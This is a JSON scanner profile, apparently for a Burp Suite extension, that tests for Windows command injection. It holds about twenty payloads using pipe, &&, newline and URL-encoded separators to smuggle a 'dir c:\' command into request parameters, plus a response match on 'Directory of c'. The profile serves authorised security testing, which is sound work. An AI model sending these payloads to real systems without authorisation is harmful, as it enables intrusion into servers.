[
 {
  "Name": "Windows-CommandInjection", 
  "Active": false, 
  "Scanner": 1, 
  "Payloads": [
   "+|+Dir+c:\\", 
   "$+|+Dir+c:\\", 
   "%26%26+|+dir c:\\", 
   "$%26%26dir c:\\", 
   "%0a+dir+c:\\", 
   "+|+Dir+c:%255c", 
   "$+|+Dir+c:%255c", 
   "%26%26+|+dir c:%255c", 
   "$%26%26dir+c:%255c", 
   "%0a+dir+c:%255c", 
   "+|+Dir+c:%2f", 
   "$+|+Dir+c:%2f", 
   "%26%26+|+dir c:%2f", 
   "$%26%26dir+c:%2f", 
   "%0a+dir+c:%2f", 
   "+dir+c:\\+|", 
   "+|+dir+c:\\+|", 
   "+|+dir+c:%2f+|", 
   "dir+c:\\", 
   "||+dir|c:\\"
  ], 
  "Encoder": [], 
  "UrlEncode": false, 
  "CharsToUrlEncode": "", 
  "Grep": [
   "Directory of c"
  ], 
  "PayloadResponse": false, 
  "NotResponse": false, 
  "NotCookie": false, 
  "TimeOut": 0, 
  "isTime": false, 
  "CaseSensitive": false, 
  "isReplace": false, 
  "ExcludeHTTP": false, 
  "OnlyHTTP": false, 
  "IsContentType": false, 
  "ContentType": "", 
  "NegativeCT": false, 
  "IsResponseCode": false, 
  "ResponseCode": "", 
  "NegativeRC": false, 
  "MatchType": 1, 
  "RedirType": 0, 
  "MaxRedir": 0, 
  "rCookies": false, 
  "spaceEncode": false, 
  "payloadPosition": 0, 
  "IssueName": "Windows-CommandInjection", 
  "IssueSeverity": "High", 
  "IssueConfidence": "Certain", 
  "IssueDetail": "Windows-CommandInjection", 
  "RemediationDetail": "", 
  "IssueBackground": "", 
  "RemediationBackground": ""
 }
]